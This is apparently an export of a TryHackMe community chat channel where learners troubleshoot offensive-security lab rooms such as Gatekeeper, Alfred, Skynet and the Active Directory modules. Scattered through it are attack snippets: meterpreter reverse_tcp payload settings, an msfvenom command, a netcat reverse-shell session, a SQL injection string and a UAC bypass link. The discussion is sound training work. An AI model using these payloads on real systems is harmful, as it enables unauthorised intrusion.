VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.18.3.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
`
It works now.
Thank you so much.
I don't know why the errors happen though
Gave +1 Rep to @dense gate
hello i am doing gatekeeper i got this
but can't get reverse shell
any help?
it is only saying Sending evil buffer...
Could not connect.
Have not done that room yet. You should consider looking at a write-up at this point
I have done exactly that from a lot of write-ups but still no
But I get a reverse shell back from my local machine
I am just having trouble calling from the THM IP
"sudo disable ufw" <--- type this command and all your rev shells will connect.
hi all,
I'm currently on this room: https://tryhackme.com/room/credharvesting
In task 8 it shows that the user bk-admin is member of THMGroupReader group which has ExtendedRightHolders. Now when i rdp into the machine with the user «thm» instead of «bk-admin» i can run the command:
Get-AdmPwdPassword -ComputerName creds-harvestin
And see the password. But I thought this should not be possible because my user «thm» is not a member of the group?
could be nested permissions down the way? Not sure have not looked at the box but was learning about it over at HTB
Hi all, I am doing the Lateral Movement and Pivoting room for AD. In Task 3 (Spawning Processes Remotely) I followed the steps and am now connected to THMIIS as nt authority\system
but when I try to run the flag.exe on the t1_leonard.summers/Desktop I get "Sorry! You are still missing something. No flag for you yet. (7)". Not sure what I'm doing wrong
hello guys, I am in the Alfred room, in the gaining reverse shell part; I do all the requisite steps to obtain a shell, but nothing happens
Hello guys, has someone completed the Alfred box with the different shells: batch, PowerShell, Meterpreter?
when you say you do the requisite to obtain a shell walk us through specifically what you are doing
Back to Lateral Movement and Pivoting room for AD. In Task 4 I did the guided practical at the end but am now working through doing it via all the methods explained. I'm trying to do the Creating Remote Service with WMI. I've created the service and run it and added my user but when I try to SSH in with my newly created user I get Permission Denied
worked it out - because we are creating a local user we cannot SSH - we would need a domain user
I mean I get a revshell with PS and Meterpreter but I did not get one for Windows batch
I did the room a while ago so can't remember the details 100%. If you want to use the load into memory method you have to use PowerShell initially. I tried doing it the non-Metasploit way starting with PowerShell and loading into memory only and had issues with being able to run WinPEAS on the target system for enumeration. The other problem I faced was using the non-Metasploit Incognito (I don't think standalone Incognito is supported anymore; it took me ages and having to look through old GitHub to even find a binary). The alternative is to use the Potato family to leverage the privilege vulnerability, however at that point I cracked the shits at the room and moved on. I will come back to it some time in the future to play around with it more. Motasem Hamdan on YouTube does a walkthrough of the room with the non-Metasploit approach using a simple netcat.
Yes, I fixed the problem, and I did it with 3 methods: PowerShell, Windows batch and Metasploit, and for the Incognito module, it worked for me. Thank you a lot
Gave +1 Rep to @sharp flame (current: #1957 - 1)
hi all! I have some trouble with the room Skynet; the connection to the machine is not good, a lot of timeouts :/
hi, it's ok today 🙂 I have finished the room 🙂 the connection is stable today!!! Can you explain to me please why one guy in the room has 200 points, but all other persons in the room have 150 points?
First blood points, the first person to get a given flag gets bonus points
hello, I am doing Lateral Movement and Pivoting Task5 and have successfully passed the hash and spawned a command prompt. I successfully connected to THMIIS using winrs and am now trying to connect to THMIIS using PsExec using the command c:\tools>PsExec64.exe \\THMIIS.za.tryhackme.com cmd but I get the response Starting cmd.exe on THMIIS.za.tryhackme.com...yhackme.com...IIS.za.tryhackme.com... cmd.exe exited on THMIIS.za.tryhackme.com with error code 0. I have tried it with Powershell too but the same thing happens
For those of you on red team, how much programming overall is needed for your job
Meh, for just pentesting it's basic knowledge, not programming every day
hello i need help l am studying cyber engineering and I want to become a red team member, and I have been advised to participate in CTFs, and I am also looking for a team
you can just inbox, okay. tryhackme.com, hackthebox.com, ctflearn, offsec proving ground; these are platforms to get you started
okay so, is there something OTHER than Immunity I can use for the B.O. section? I don't want to add in a Windows VM just to do B.O. labs
Hello
I'm doing a room named "Relevant"
I'm trying to access smbclient using the following command:
`smbclient -L \\10.10.104.91\nt4wrksv -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.104.91 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available`
but as you can see, it is always returning error
In the walkthroughs, there is no such error. Does anybody know why that is happening?
that screenshot is from the walkthrough
it doesn't show that I need to enter a password or error happening
Do you have the box open now?
my PC screenshot would look like:
you mean connected to it ? yes
I just connected and downloaded passwords.txt fine
Try using just one slash after the ip
And only two slashes at the start
Thank you so much
It worked.
I think I needed to change the slashes as you advised and remove that -L
Gave +1 Rep to @finite pivot (current: #2 - 1897)
Yup. 🙂
any advice on how to improve my windows boxes related knowledge? I feel I am still zero in it. Linux is the best for me.
Thm has a few, IIRC.
External material is good if you can get it.
Grind them I guess - Anthem, Internal, Blue Print, Hack Park, Flatline, Blue, Atlas are ones I can think off the top of my head. Working on my Windows skills as well.
Thank you so much
Gave +1 Rep to @finite pivot (current: #2 - 1898)
Thank you so much
Is it normal to not master windows while feeling good at linux?
I suppose it is because there are more Linux boxes as creators don't have to worry about OS license unlike in Windows.
And Windows requires more resources than Linux? I think, but because Windows is so widely used in enterprise environments, you have to get well versed in it.
Thank you so much.
I thought that It's just me who is bad in windows and never thought about the number of boxes I did.
really appreciate your answers.
any recommendations for additional courses to improve my Windows hacking skills besides the rooms above, or is that just enough for me as a preparation step before starting HTB or OSCP?
Gave +1 Rep to @lofty sky (current: #19 - 373)
Do check Tib3rius or TCM's Windows PrivEsc boxes in THM to give you an idea on how they laid out their courses.
Thank you so much.
I will check TCM's boxes and their course then.
Gave +1 Rep to @lofty sky (current: #19 - 374)
I'm working on the ExploitingAD module. For some reason my user that I got from the distributor cannot RDP into THMWRK1 - it says timeout waiting for connection. I can ssh into it though so the machine is in fact working.
I also tried it with the t2 account that we compromised in Task2 but same thing - just times out. Can still SSH into the machine though
Hello all, I need some help please! In the room Overpass, I can't use hashcat to crack the pass with salt because my hashcat gives me the error message: Device #1: Not enough allocatable device memory for this attack. Can we change the allocatable device memory for the attack please? I have only 702/1468 MB (256 MB allocatable), 4MCU
Thx for helping
You're trying to crack ||the passphrase for the SSH private key|| then? I don't recall there being any password cracking outside of that within that room. If this is indeed what you are stuck on I'd try and use johntheripper if I was you.
thank you 😉! I am in the Task 2 Research - Analyse the code 🙂 last question 🙂 but I think I need to install the CUDA toolkit in my Kali for hashcat to detect my GPU 🙂
I really wouldn't bother trying to do that; just use hashcat on your host if you need the GPU power.
ok thx you 🙂 , i increase my knowledge 😉
Hi guys I wanted to know if there is anymore cool AD boxes like razorblack? would love to practice more on AD using boxes to get my methodology right😃
good spirit
Look at Reset and Enterprise. Haven't done AD rooms yet so those two are the only ones that come to mind.
sure thank you so much😃
Gave +1 Rep to @lofty sky (current: #18 - 378)
Hey Guys! After the Jr. Pentester path and some basic paths I'm trying to complete this Offensive Pentesting path, but at the Buffer Overflow Prep room I was like: WHHAAAAAAAAT? I searched for easier Buffer Overflow rooms and I ended up with the "Buffer Overflows" room. I feel I'm still a bit lost so I need advice on where to start this topic? Thank you 🙂
Hello, I'm having an issue while connecting to the Exploiting Active Directory room. Used both methods, OpenVPN and AttackBox. Not able to share screenshots here as it's only showing the "Use Apps" option. Please guide me on how to insert screenshots for better understanding of the issue
You'll have to verify your account to post screenshots
Can you describe the issue you are having?
1] Used OpenVPN method for connection
2] Used AttackBox for connection but there is no "exploitad" interface available
Have you tried to vote for a network reset?
Yes
Also, do check the pinned posts in the #exploiting-ad channel to see if any would help.
I read pinned messages in #exploit-ad, the ping is working but it's not able to find THM Nameserver. What is issue here? Please explain
Did you set it following the instruction in the room? There was a command it asked you to run to set your DNS.
Are you referring to above given systemd-resolve command?
I just finished that room on my YouTube live
Yes... you must do that if you're using the AttackBox... change the $THMDCIP based on the network.
Already tried to use the given command with $THMDCIP as well as the $THMCHILDDC IP but it's not working as the "exploitad" network interface is not present on the AttackBox. Please explain to me what I am doing wrong here?
Looks like the AttackBox does not have the Exploiting AD interface
Yes, so what should I do now?
Try using tun0 as the interface then
Ok , let's see what happen then
Used "tun0" as the interface with both the $THMDC & $THMCHILDDC IP but still not able to connect
Which room are you doing?
He was setting up the DNS for Exploiting AD.
how do you build a DNS server from scratch? Is it just a Windows server that works like an HTTP server but resolves names instead, like a database only?
hi guys... need help... I am doing Gatekeeper and am already on the box... why does winpeas.exe not work?
Even if the exe file matches the OS architecture (unless you are using the any version of the exe)?
I didn't check the architecture; I only have a 64-bit winPEAS
Can you do systeminfo just to check the architecture? Or you can use the Any version of the binary.
yups... I changed my payload using the Meterpreter session and am working on it
Yeeeiiii, got something new again to learn, got the credential dumping using Firefox.
Thank you for the walkthrough 😅
Is the unquoted service path vulnerability still an issue in Win10/11?… isn't there any defensive mechanism that intercepts it automatically and fixes it?
any tips on understanding reverse SSH tunnels? useful rooms or walkthroughs welcome. just did Game Zone and am totally clueless lol
Kitty room is using an SSH tunnel for privilege...
ssh user@ip -L port_local:local_ip:remote_port
Guys, literally who is messing with the .kdbx file? First, after downloading the file and opening the database, there is no flag there and no service account; instead someone made an account named Michael. Literally very frustrated with this
In which room is this occurring?
Hey Guys! I have a hard time with the Brainstorm room. Firstly, nobody ever found 6 open ports. At least I couldn't find any write-up with an explanation of why 6 is the answer... Secondly, it seems like this room can't be completed in the AttackBox. (Is that right?) It's a bit frustrating.
IIRC you need a Windows VM with Immunity Debugger for the BoF
I used the Buffer Overflow Prep machine to do that 😅 since I don't want to install Windows
hello, please, I need help in the room Skynet
nmap -A ip didn't work
also ping is not working
Hello, I'd like to share this video with those interested in understanding Buffer Overflow concepts in general and preparing for Buffer Overflow Prep CTF https://www.youtube.com/playlist?list=PLRS1rLRk5OUX7-qUErv1Q7LejuwR6cvod
Try -Pn
yeah I try it thanks for your help
Hi,
I cant RDP into the VM using the command xfreerdp……
Which room are you working on?
Buffer Overflow Prep
Can't RDP into Windows 7 VM in Buffer Overflow Prep. I get this error: xfreerdp /u:admin /p:password /cert:ignore /v:10.10.99.147
[21:24:44:353] [4551:4552] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
Try adding /tls-seclevel:1.2 if you use version 1.2
did anyone have trouble with OVERFLOW2? I get it to crash at 2100 bytes, but the offset is wrong.
are you in the Buffer Overflow Prep room? I think your offset is wrong.
I am doing this path and got to the Buffer Overflow section but have never done any before. What rooms I should do to learn buffer overflow before I can start the practice here?
I think this room, Buffer Overflow Prep, will guide us on how to pwn the machine
It says that "this room does not teach buffer overflow from scratch...". I'm wondering what rooms I should do to learn buffer overflow from scratch
try this one https://tryhackme.com/room/bof1
Ya… trying to figure out why. I set it to OVERFLOW2, changed scripts to OVERFLOW2, it crashes at 700 bytes initially… I tried adding bytes and it doesn't crash until 2100, and the offset ends up being 2208 which is wrong
nevermind.. it works now lol.. not sure what happened.
could someone go add a vote in BreachingAD to reset network? need 2 🙏🏽
Can you state your subnet? 10.200.xxx.101
The xxx will be your subnet.
haha 9
thanks!
It's just so people don't vote to reset who aren't in your subnet.
Gave +1 Rep to @limber notch (current: #1325 - 2)
ohh, yeah, I didn't think about that.
Hi,
In the "Hacking with Powershell" room, in Task 3, as far as I tested there is a bit of misleading information.
I can't send a screenshot, but it's in the part where the following command is explained:
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
From what I tried, the Value must be in single/double quotes in order for Powershell to understand it correctly. Otherwise, you get an error
for example:
Correct form:
Get-Service | Where-Object {$_.Status -eq 'Stopped'}
Incorrect form:
Get-Service | Where-Object {$_.Status -eq Stopped}
hi - when i execute WinPeas in a compromised windows box, it does run and shows its initial checks but after a while, the shell terminal just goes blank and no output is shown in the terminal. Any idea what went wrong?
Maybe it still hasn't completed running? I've had similar instances where it doesn't completely run even if I restart the target and execute it multiple times.
I resolved it by using its .bat version instead. For some reason, the exe seems glitchy.
Will try this one as well. Thanks for the tip.
Gave +1 Rep to @arctic quarry (current: #1332 - 2)
how to get phone number from linkedin?
What are you trying to accomplish?
does someone know if the Brainstorm room is working correctly? I can't list the files when connecting to FTP, it shows '229 Entering Extended Passive Mode (|||49379|)'. I'm not sure if I need to do something else
also, the first answer is 6 open ports but I never found 6 open ports; even with a UDP scan I only found 3
You can type passive off
idk, but try with the -p- flag together with -Pn
how did this get resolved? Please assist
Hackpark box, Task 3: I uploaded the PostView.ascx file and then tried to get a reverse shell but I get the error: Ooops! An unexpected error has occurred.
This one's down to me! Please accept my apologies for this - I'll see to it that the developer responsible for this happening is given 20 lashes (but only after he or she has fixed this problem).
Does anyone have a clue how to solve this hurdle here: the command which I gave in the browser is http://10.10.216.235/?theme=../../App_Data/files
Make sure you are using the LHOST address while updating the exploit code - silly mistake at my end
It can happen to anyone
I am having an issue with the Skynet room. I keep getting this error any time I try to connect to the smbclient "session setup failed: NT_STATUS_LOGON_FAILURE", any help?
What is your complete smbclient command?
smbclient -U milesdyson \\\\10.10.52.205\\milesdyson
Are you certain you have the correct password?
Yeah
Did you manage to make this work?
Yeah I managed to. Thanks
Gave +1 Rep to @lofty sky (current: #14 - 488)
Hey Void, I'm having the exact same issue, oh wow, 2 YEARS later! Did you manage to fix the error?
Hey everyone, I've recently been working through the THM path on buffer overflows and have been doing Brainstorm, a simple Windows box running a vulnerable program called Chatserver.exe. I want to run Chatserver.exe on my local Windows machine to test my payload, but I just keep getting this error (below). I've used Windows 10 32-bit, tried Windows 11 64-bit virtual machines, and I've tried it on my local Windows desktop (very unsafe of course) but to no avail. It also doesn't seem to be working on my Kali computer. Any tips? Anyone else had this problem? Any help is so appreciated! 😄
Hey there! Wow what a long time ago hahaha
For the solution (that solved it in my case) just scroll down a bit from that message
Oh wait I take that back, I guess I was never able to solve it 😅
Crazy, right! I tried using a virtual machine (using VirtualBox); pretty sure this is just all the default settings from the official Windows ISO image. But still no luck.
Any idea what daft mistake I've made?
(thanks for the reply btw!)
oh XD
I might just have to skip this one for now...
All the other buffer overflows have been fine.
👍
Hey just wondering (sorry to disturb you) but did any of the other boxes work for that section? I'd just like a heads up before I waste time wrestling with them.
Hey no worries 😄 I honestly don't remember since it happened so long ago
DMd you
All of the file extensions are not allowed. Why is it?
This room needs to be updated. When selecting the position when fuzzing the file extension, don't include the "." and also remove the "." from your phpextension list file
Is this Vulnversity? Do you have the correct directory?
Hi, everyone
Hey!
Hi
Hey
I am studying the PJPT and we are using the same material from my understanding. I wouldn’t mind
I am in the TCM Security discord group as well and the general consensus is that using their material is more than sufficient. Also, please use other channels as this is for THM's Offensive Pentesting learning path 🙂
Hey THM Community! For those that want to enhance your knowledge in network pivoting for THM's boxes, I've just uploaded a video on YouTube on how to use the chisel and socat tools within a corporate infrastructure to move between different networks.
This pivoting lab consists of exploiting 3 Vulnhub machines located on different networks, where we will have to apply network pivoting concepts in order to gain access as attackers to the various networks as we compromise each machine. We will use manual techniques with chisel and socat.
Symfonos machines from Vulnhub...
Might be better posted in #thm-community-media I guess?
Can anyone sniff-test gatekeeper for me?
Yesterday I couldn't get the buffer overflow (using the recipe that had worked previously) and today no ports are open on the machine 😖
It's been up for ~10m by now (free user)
What's the ip?
10.10.248.96
up for 30m now.
Just before I check.
You remember it's a Windows box, right?
100%
Are you suggesting there's something banning my IP due to the portscan?
Cause SMB and everything else isn't coming up either.
(I suspect it may be a VM resource issue)
Hey got a quick question on the Lateral Movement and Pivoting room any free to help?
I've been doing a series of livestreams as I progress through this learning path; this is the most recent addition (started a bit late in the path)
This was a fun one. This time I had to write an exploit for a server where I didn't have the ability to debug the actual instance I was exploiting.
Had to set up my own Windows VM and write the exploit there, change my payload and then deploy it on the "live" service.
Sure enough I got a shell at the end 🙂
Thinking about doing this pathway and saw there was a buffer overflow section. Does it teach you how to perform buffer overflows or do you have to learn it on your own?
both
teaches you how to write them; performing them is optional, but I like to get a shell for each one
This is me going through OVERFLOW7 somewhat quickly, after spending 5 min figuring out how/why the port was in use
Broadcasted live on Twitch -- Watch live at https://www.twitch.tv/vtstech_
for the GameZone room, why do I need to include the - at the end when the -- before it should start the comment and comment out the rest of the statement?
this is the sql they say to input:
' or 1=1 -- -
I read somewhere that it is to "protect" the space after the -- as it sometimes gets filtered.
Thank you! That makes sense. I'm guessing in that THM room they must be doing that filtering. I was curious because everything I looked up said a comment was just '--', so I wanted to know the purpose of the last '-'
If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement
Anybody know if this means UAC bypass might be possible?
I am currently having a bit of difficulty with the room Alfred on the Offensive Pentesting Path. Is this the best place to reach out for some potential guidance?
I'm not exactly sure what the problem was, but after a couple of hours, I got it figured out. There was some problem with how I was downloading the .ps1 script.
For the Skynet room the connection to the box is having a bunch of connection issues, especially with Samba.
It takes at least 10 seconds for what I type to show up in the terminal, and I keep getting timeout errors running basic commands like 'cd', 'ls', 'get', etc....
I'm using the VPN connection from my own Kali instance, but I've never experienced errors like this before using it.
Think it's your shell; try: python -c 'import pty;pty.spawn("/bin/bash")'
This path requires me to understand buffer overflow?
there's a module about it in the course so you'll do fine following along
I'm in the midst of it
Quick question on overpass2
you mean the prep room?
||found the backdoor and all, and i'm on cracking the hash but it doesn't seem to be salted as just by reading it and even hashcat/hashid don't see it salted, has something changed or is it just the working of my tools that is weird?||
i mean there's a whole section about buffer overflow
yeah, ik, the first one is a ctrl+c and ctrl+v; the other ones are challenges
oh you gotta check the github
don't only copy/paste try understanding what it does ^^
gosh just realized what i missed....; thanks!
Gave +1 Rep to @bright wing (current: #1096 - 3)
you're welcome; ngl, it isn't your fault, the questions were unclear
Trying to do the Overpass 2 - Hacked room but... when trying to do the 2nd question, it's not working and in Wireshark I'm getting this payload.
It's the symbols, it's a known issue. 🙂
Anyone have any tips for dealing with the RDP machine in the BOF Prep room? It crashes or freezes every two seconds lol
really sucks 
Ya, it's basically impossible to work with. I tried to use the VIP VPN too but not really any different
for the buffer overflow challenges, how do you solve these without having to set up a brand new vm with windows and immunity debugger? We really should have a windows machine available with immunity debugger in those 3 rooms.
+1
Why is the Offensive Pentesting path not there on the new THM roadmap?
I assume he means https://tryhackme.com/r/hacktivities
Indeed, not all available paths are included in the roadmap. 🙂
If I may ask, is there a specific reason for it? Because doing the Offensive Pentesting Path before the Redteaming would make sense right?
Not sure about the exact reason, although I imagine it has overlap with the Jr Penetration Tester path, so it might be a matter of selection.
How do I get started in cybersecurity so that I can hack like a Black hat hacker and secure them like a cybersecurity expert
Do check the #start-here channel.
Think which other rooms have such a machine already... 😈
Hello everyone,
I have completed the following paths:
- Jr Penetration Tester
- Web Fundamentals
- Web Application Pentesting
Then, I started the Offensive Pentesting Path and managed to go through Getting Started and Advanced Exploitation without any issues. However, I don’t feel ready for Buffer Overflow and Active Directory yet.
Do you think it would be useful to complete the Red Teaming Path first and then return to finish Offensive Pentesting?
Yes 🙂
Complete it first and after it do some x86 rooms
Thanks
Gave +1 Rep to @lean scaffold (current: #1 - 3910)
Hi there, I'm getting some DNS issues in order to start with Active Directory breach scenario. What's the best way to proceed?
Hi all, is anyone having issues with the Enumerating Active Directory VPN profile? Seems to be corrupt every time I try to download it.
Leave the room and re-join, then try to download the VPN file again
Thanks @lean scaffold ,still isn't working though. Downloading a blank file 🫤
Gave +1 Rep to @lean scaffold (current: #1 - 4085)
Are you a premium user?
Yea, streak is on 148 too
Have you started the network beforehand?
yea once, think it was couple days ago now
Can you try to restart the network?
Yup we're all good now, thanks @lean scaffold 🫡
Gave +1 Rep to @lean scaffold (current: #1 - 4087)
If anyone here has a small study group for OSCP prep, please DM me or add me in there. I'm going through THM rooms for now. We can perhaps learn together.
PS: if such posts are not allowed here, please let me know so I can delete this.
Yes
Try to ask guys in the #cyber-and-careers channel, guys there can give you some great cert. advice 🙂
hi mod how to get OSCP tag.
where can i send proof or something to get a tag.
Hi 🙂. Try to reach out to Jabba or Scrubz, I don't think I have a permission to give roles yet 🙂
hey guys
Anybody here solved Kenobi??
When I try to mount the share point I am getting errors
What is the exact command you are running? Can you share a screenshot of it (you'll need to verify your account to do so)?
@slender ridge
I'm running into issues on task 4 of Steel Mountain. Skipped it and finished Alfred but don't want to keep skipping it since I feel like I must be doing something wrong. I am getting an error when trying to serve the NC library over port 80 since it's apparently already in use? Is there a way to force the python script to download the ncat library over a different port? Or a way to stop whatever is on port 80 without crashing the attack box?
Can you provide some shots ?
Uh, I'm trying to share but it's saying attachments are disabled. You can replicate in any Linux attack box with the command "python3 -m http.server 80" where again, 80 is already in use by something.
I ended up completing it by cheating a bit and running the python server to host the file on a different port and encoding ":port#" in the text string of the exploit so that it would pick up the NC library over a port not being used because I was a bit impatient 🙃
But that should for sure be amended for future users.
You will have to verify first
The Attackbox is using port 80 for it to be accessible via web.
That makes sense. Glad I figured out a workaround but there should probably be a note in any room expecting to serve files over 80 that it for sure won't work then, right? That's hella confusing for someone who might not have as much "hacking" experience (read: breaking stuff to make my own crummy web stacks work)
Is there a way to do that over email? Would rather not give discord more info just to send a screen cap but I would love to see this clarified for future users
To clarify the room suggests you can run a script that will download the file but it never works since you can't serve a file from the attack box off of port 80 (you get an error saying it's in use) and that's the only place the script looks (unless you modify it to look for the file at a different port)
wdym more info lol
discord can't do a thing with the provided token and doesn't even have an idea what it's for.
Do you have another method of reporting a bug in a room that isn't discord like an email or a chat on the site itself? That would be helpful info 😁
The THM discord verification only involves putting in the token to the THM discord bot
@timber wind
Am I doing something wrong in the alfred room (upgrading to metasploit/Task 2) or is this just msfjank? Tried a couple times but not getting much success even rebooted the box a few times
What payload are you using?
It's an msfvenom payload from the task
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai
I set the IP to my tun0 interface, and the port to one I know isn't behind a firewall, then set up the listener with
windows/meterpreter/reverse_tcp
I got it, it was me being dumb!! I was trying to kick the stager off via a jenkins build job and not via the initial shell
root.txt acquired
❓ For https://tryhackme.com/room/hackpark , task 4 I know which binary it is, but I would like to find out which process/mechanism is responsible for spawning this binary periodically? It doesn't seem to be due to a service or a scheduled task, though I may be wrong as Windows is not my forte.
Are you referring to the || Windows Task Scheduler ||?
Indeed, I would expect ||Windows Scheduler|| to periodically execute ||Message.exe||. However, I ran schtasks /query /fo LIST /v to get the details of every scheduled task and none is referencing ||Message.exe||. Unless one of these tasks is indirectly calling ||Message.exe|| I don't understand how it is getting spawned.
There is one log file you will see where ||Message.exe|| is being run or called. Can't remember if it is in the same folder.
Ok, I finally understand. This setup is not using the standard Windows Task scheduler, it's using a 3rd party tool: System Scheduler Professional. That's why schtasks was useless. Thanks @lofty sky
Gave +1 Rep to @lofty sky (current: #12 - 835)
Hope it helped. Also, just noticed your pfp corresponds to the room's theme.
Hehe, true 🤡 Thanks for the help. I learned a ton from this little side step and that's what matters.
Just spent the last 20 minutes setting up a meterpreter session to try to escalate to root on Overpass 2 before I finally remembered to look at the files
I made chatGPT roast me and dude is savage
Do most people use their own machine when engaging with content on this path? Kinda confused with the buffer overflow stuff as everything is taught in windows then I guess they expect you to create a buffer overflow using Linux all of a sudden? I guess I could go off path and do another module but kinda weird structure unless I'm missing something major
If an application allows the PUT method to perform a certain action instead of the POST method, then how can we exploit the PUT API when they have implemented strong checks on the payload and role-based access control?
Is this related to any THM specific room in the learning path? If not, suggest to post this in #infosec-general
Hello everyone, I am extremely curious about the effectiveness of THM for offense, please share your thoughts so that I don't waste my time
wdym ?
Hi
I could send any message in looking for a group
It says to go to offensive path
Event is over, the #1385311669256982608 channel isn't active anymore 🙂
When will it get active?
It won't, the event is over. It will be deleted
Okay
sed
Hi
sup?
How are you?
am fine you?
Fine
cool
Would you like to be my friend?
By the way does anyone have any advice on the brainstorm room because when I run chatserver.exe in the windows vm and then try to nc on port 9999 it says connection refused but the windows machine doesn't even have a firewall
It works on the actual tryhackme spawned server but when I download it and put it on a vm it doesn't work anymore
👋 hey all Trying to exploit a web server for a ctf challenge, I’m searching metasploit for a vulnerability on an Apache server.
Apache / 2.4.41 (Ubuntu)
When looking into exploits how important is the version to the exploit?
When I search the whole server info nothing comes up, but I get many results for Apache
It's very important. You need to use the version of the exploit that targets the vulnerable version of the software used by the web app, ex: an exploit for Apache 2.4.42 won't work for your target
Hello hackers, I need a lil help with setting up DNS for Breaching Active Directory... Can anyone help?
Did you get it working?
Still fighting with ChatGPT to help me..
If you can.. please
I am trying to set it up on my Kali
Add nameserver <THMDCIP> to /etc/resolv.conf, above the other entries; that worked for me.
I am on the attackbox so results may vary.
Hello guys, I am having difficulty with my first room
It's wordlist.txt not worldlist.txt 🙂
Thanks
Gave +1 Rep to @lean scaffold (current: #1 - 5741)
Greetings. I would like to ask for your opinion on report writing. I followed the writeup in the room relevant, as well as the room writingpentestreports, to understand the way to write a report. My problem is how do you determine what type of vulnerabilities they are for those encountered in relevant, since it requires ||1. a writable SMB share 2. an IIS server that links to the directory of the share to trigger the payload.|| Do you write 2 vulnerabilities or name them as 1? What will be the title of the vulnerability? How do you determine the risk rating? Is it through looking for a similar one in the CVE database for the CVSS rating?
As for the CVSS rating, you may find the CVSS Calculator useful:
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
I'm not a pentester by profession, but IMHO, I would put in two separate vulnerabilities (which are both misconfigurations). However, I will indicate on the IIS server issue that it can be chained with the writable SMB share.
Thank you for both of your replies. Regarding the risk rating, most reports in https://github.com/juliocesarfort/public-pentesting-reports seem to use their own qualitative rating instead of CVSS. One report, Pentest-Limited/Report URI - 2020 Penetration Test Report.pdf, even mentioned they use both since CVSS is not enough to cover all risks, which leaves some of the vulnerabilities without a CVSS rating. What is your opinion on their choices? Is it better to stick to the CVSS rating like the writingpentestreports room, and why?
Please, is anyone into secure-side review lately? I am looking for someone to do it with
Hello
@lean scaffold can you help sir?
regarding ?
The bot didn't start so I skipped the first quiz
Now I cannot proceed to
The next quiz
What will I do?
Guys, I hit start machine and it just doesn't load anything. It says I'm active on it, but it literally doesn't show up. Is this okay? I'm new to THM
If you can verify your account and share screenshots or images, that would be helpful.
Hi! About the Relevant machine: it constantly 'disappears' from the network after deploying it (I am almost sure why, but cannot guarantee it). It happens every ~15-20 minutes and I have to re-create the machine in the web portal.
Is there a way to have it not crash constantly? Or to have a better availability towards it?
The Gobuster: The Basic (Task 4)
:~/Desktop# gobuster dir -u "www.offensivetools.thm" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://www.offensivetools.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
Error: error on running gobuster: unable to connect to http://www.offensivetools.thm/: Get "http://www.offensivetools.thm/": dial tcp: lookup www.offensivetools.thm on 127.0.0.1:53: no such host
No such host. How can I reach it and finish the task?
Configure DNS settings per task instructions then run these commands to restart the service
sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
/etc/init.d/dnsmasq restart
Thank you, but I suppose I first had to create a new resolv-dnsmasq, because there were some other IPs in there
+rep
has anything happened with the https://tryhackme.com/room/bufferoverflowprep room?
Yesterday it was available but now it can't be found
It is still referenced by the learning path https://tryhackme.com/path/outline/pentesting
.
:hammer: rohitgupta0127#0 has been banned.
I'm so frustrated with the AD rooms right now. I keep having issues with the DNS stuff.
(just venting)
Hmm, did you find it? I have downloaded a cached one.
how do you do that?
Last year I downloaded the room website
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.9.1.109] from (UNKNOWN) [10.10.218.77] 60394
$ python -c "import pty; pty.spawn ('/bin/bash')"
www-data@ip-10-10-218-77:/$ ^Z
zsh: suspended nc -lvnp 1234
┌──(uknown㉿kali)-[~/Downloads/shells]
└─$ stty raw -echo
┌──(uknown㉿kali)-[~/Downloads/shells]
└─$ fg
[1] + continued nc -lvnp 1234
Each time I press ctrl z to background a job and press the stty raw -echo and then the fg, I get stuck in continued nc ip and I can't press enter as enter keeps showing ^M
This is stabilizing a reverse shell btw
Have you tried putting it in a single line?
stty raw -echo; fg
@potent geyser Hi
hello
Hey guys, I need help with the Exploiting Active Directory module. Does anyone face the same issue as me in the exploiting certificate portion? Actually, after generating the certificate, when I try to get a TGT with rubeus.exe it says KRB-ERROR(24): KDC_ERR_PREAUTH_FAILED. Can anyone help me with this? I already tried it several times as the instructions are given, but every time I fall into this same pothole! Please, anyone!!
Could anybody please guide me about which learning paths are good for oscp preparation?
Ok, thank you
Gave +1 Rep to @lofty sky (current: #12 - 903)
If anybody else is also starting their preparation for OSCP and would like to do it together then please let me know. I am a fresher in pentesting role and have basic to intermediate knowledge in cybersecurity...... more on the basic side you can say.
YOO
yes i want
?
Sent you a friend request
Yes, what happened?
Sure
👍
Hello, I just started on this TryHackMe journey today. I'm doing offensive security and I'm super excited about it. Anyone new to TryHackMe???
Me too, let's be friends so we could help each other
Yeah, new and excited. Just like you
Hey, newbie here! Can anyone give me tips related to privilege escalation, as I'm always stuck after the enumeration part when solving rooms?
